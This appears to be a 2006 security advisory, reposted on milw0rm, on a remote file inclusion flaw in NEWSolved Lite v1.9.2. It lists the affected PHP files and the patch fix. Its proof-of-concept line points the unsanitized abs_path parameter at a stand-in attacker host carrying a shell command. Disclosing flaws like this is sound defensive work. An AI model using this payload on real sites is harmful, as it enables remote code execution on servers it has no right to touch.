44 lines
No EOL
1.3 KiB
Text
44 lines
No EOL
1.3 KiB
Text
+--------------------------------------------------------------------
|
|
+
|
|
+ NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion
|
|
+
|
|
+--------------------------------------------------------------------
|
|
+
|
|
+ Affected Software .: NEWSolved Lite v1.9.2 (maybe above)
|
|
+ Venedor ...........: http://www.usolved.net
|
|
+ Class .............: Remote File Inclusion
|
|
+ Risk ..............: high (Remote File Execution)
|
|
+ Found by ..........: Philipp Niedziela
|
|
+ Original advisory .: http://www.bb-pcsecurity.de/sicherheit_286.htm
|
|
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
|
|
+ http://www.bb-pcsecurity.de
|
|
+
|
|
+--------------------------------------------------------------------
|
|
+
|
|
+ Affected files:
|
|
+
|
|
+ newsscript_lyt.php
|
|
+ newsticker/newsscript_get.php
|
|
+ inc/output/news_theme1.php
|
|
+ inc/output/news_theme2.php
|
|
+ inc/output/news_theme3.php
|
|
+
|
|
+--------------------------------------------------------------------
|
|
+
|
|
+ $abs_path is not properly sanitized before being used
|
|
+
|
|
+--------------------------------------------------------------------
|
|
+
|
|
+ Solution:
|
|
+
|
|
+ Download Patch v1.9.3 and replace the files above.
|
|
+
|
|
+--------------------------------------------------------------------
|
|
+
|
|
+ PoC:
|
|
+
|
|
+ http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls
|
|
+
|
|
+-------------------------[ E O F ]----------------------------------
|
|
|
|
# milw0rm.com [2006-08-07] |